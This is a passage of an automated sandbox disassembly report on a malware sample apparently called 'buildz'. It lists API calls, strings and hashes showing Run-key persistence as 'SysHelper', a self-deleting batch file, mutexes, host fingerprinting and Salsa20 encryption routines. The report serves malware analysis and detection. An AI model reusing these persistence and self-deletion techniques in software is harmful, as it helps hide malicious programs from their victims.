                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                          • String ID: .\crypto\rand\rand_win.c$DISPLAY
                          • API String ID: 151064509-1805842116
                          • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                          • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                          • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                          • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                          APIs
                          • _malloc.LIBCMT ref: 0040E67F
                            • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                            • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                            • Part of subcall function 00420C62: HeapAlloc.KERNEL32(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                          • _malloc.LIBCMT ref: 0040E68B
                          • _wprintf.LIBCMT ref: 0040E69E
                          • _free.LIBCMT ref: 0040E6A4
                            • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                            • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                          • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                          • _free.LIBCMT ref: 0040E6C5
                          • _malloc.LIBCMT ref: 0040E6CD
                          • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                          • _sprintf.LIBCMT ref: 0040E720
                          • _wprintf.LIBCMT ref: 0040E732
                          • _wprintf.LIBCMT ref: 0040E73C
                          • _free.LIBCMT ref: 0040E745
                          Strings
                          • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                          • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                          • Address: %s, mac: %s, xrefs: 0040E72D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocErrorFreeLast_sprintf
                          • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                          • API String ID: 473631332-1604013687
                          • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                          • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                          • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                          • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                          APIs
                            • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                            • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                            • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                          • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                          • _memmove.LIBCMT ref: 00410427
                          • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                          • _memmove.LIBCMT ref: 00410514
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                          • String ID:
                          • API String ID: 273148273-0
                          • Opcode ID: 5d71b88130c3850f1ce6f9c9fc3c3b56fc5be04f011d63241bb511ce3f1a2a20
                          • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                          • Opcode Fuzzy Hash: 5d71b88130c3850f1ce6f9c9fc3c3b56fc5be04f011d63241bb511ce3f1a2a20
                          • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                          • String ID:
                          • API String ID: 3232302685-0
                          • Opcode ID: 17126a02ccb6bbc5f32dfe245874f9dcbc49a53b6c6b99fc4e7ab7c0e104719e
                          • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                          • Opcode Fuzzy Hash: 17126a02ccb6bbc5f32dfe245874f9dcbc49a53b6c6b99fc4e7ab7c0e104719e
                          • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                          APIs
                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          • API String ID: 2299586839-711371036
                          • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                          • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                          • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                          • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                          APIs
                          Strings
                          • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                          • input != nullptr && output != nullptr, xrefs: 0040C095
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __wassert
                          • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                          • API String ID: 3993402318-1975116136
                          • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                          • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                          • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                          • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                          APIs
                          • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHashRelease
                          • String ID:
                          • API String ID: 3989222877-0
                          • Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                          • Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
                          • Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                          • Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528
                          APIs
                          • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHashRelease
                          • String ID:
                          • API String ID: 3989222877-0
                          • Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                          • Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
                          • Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                          • Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928
                          APIs
                          • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHashRelease
                          • String ID:
                          • API String ID: 3989222877-0
                          • Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                          • Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
                          • Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                          • Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29
                          APIs
                          • GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                          • Instruction ID: c175dc67e46cb5b18e7b8d473ad54adbb7c8ff58e9170129aa5670ed77b5f39c
                          • Opcode Fuzzy Hash: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                          • Instruction Fuzzy Hash: 79B012F0705102474B480B387C9804935D47708305300407DF00BC11A0EF70C860BA08
                          APIs
                          • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                          • GetLastError.KERNEL32 ref: 00412509
                          • CloseHandle.KERNEL32 ref: 0041251C
                          • CloseHandle.KERNEL32 ref: 00412539
                          • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                          • GetLastError.KERNEL32 ref: 0041255B
                          • CloseHandle.KERNEL32 ref: 0041256E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateErrorLastMutex
                          • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                          • API String ID: 2372642624-488272950
                          • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                          • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                          • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                          • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                          APIs
                          • DecodePointer.KERNEL32 ref: 00427B29
                          • _free.LIBCMT ref: 00427B42
                            • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                            • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                          • _free.LIBCMT ref: 00427B55
                          • _free.LIBCMT ref: 00427B73
                          • _free.LIBCMT ref: 00427B85
                          • _free.LIBCMT ref: 00427B96
                          • _free.LIBCMT ref: 00427BA1
                          • _free.LIBCMT ref: 00427BC5
                          • EncodePointer.KERNEL32(006751E0), ref: 00427BCC
                          • _free.LIBCMT ref: 00427BE1
                          • _free.LIBCMT ref: 00427BF7
                          • _free.LIBCMT ref: 00427C1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                          • String ID: Qg
                          • API String ID: 3064303923-2487684210
                          • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                          • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                          • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                          • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strncmp
                          • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                          • API String ID: 909875538-2733969777
                          • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                          • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                          • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                          • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                          • String ID:
                          • API String ID: 1503006713-0
                          • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                          • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                          • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                          • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                          APIs
                          • PostQuitMessage.USER32(00000000), ref: 0041BB49
                          • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                          • _malloc.LIBCMT ref: 0041BBE4
                          • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                          • _free.LIBCMT ref: 0041BCD7
                            • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                            • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                            • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                            • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                            • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                            • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                          • IsWindow.USER32(?), ref: 0041BF69
                          • DestroyWindow.USER32(?), ref: 0041BF7B
                          • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                          • String ID:
                          • API String ID: 3873257347-0
                          • Opcode ID: 872b512db91234dd009610a63f2564f2aa606f2dd561917cc2f2326c6301647b
                          • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                          • Opcode Fuzzy Hash: 872b512db91234dd009610a63f2564f2aa606f2dd561917cc2f2326c6301647b
                          • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 00411BB0
                          • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                          • CoUninitialize.OLE32 ref: 00411BD0
                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                          • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                          • lstrcatW.KERNEL32(?), ref: 00411C44
                          • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                          • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                          • String ID: \shell32.dll
                          • API String ID: 679253221-3783449302
                          • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                          • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                          • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                          • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                          • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                          • GetDesktopWindow.USER32 ref: 004549FB
                          • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                          • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                          • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                          • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                          • _wcsstr.LIBCMT ref: 00454A8A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                          • String ID: Service-0x$_OPENSSL_isservice
                          • API String ID: 2112994598-1672312481
                          • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                          • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                          • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                          • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                          APIs
                          • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                          • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                          • __vfwprintf_p.LIBCMT ref: 00454B27
                            • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                          • vswprintf.LIBCMT ref: 00454B5D
                          • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                          • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                          • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                          • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                          • String ID: OPENSSL$OpenSSL: FATAL
                          • API String ID: 277090408-1348657634
                          • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                          • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                          • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                          • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                          • _memset.LIBCMT ref: 004123B6
                          • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                          • RegCloseKey.ADVAPI32(?), ref: 004123E7
                          • GetCommandLineW.KERNEL32 ref: 004123F4
                          • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                          • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                          • lstrcmpW.KERNEL32(?,?), ref: 00412422
                          Strings
                          • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                          • SysHelper, xrefs: 004123D6
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                          • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                          • API String ID: 122392481-4165002228
                          • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                          • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                          • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
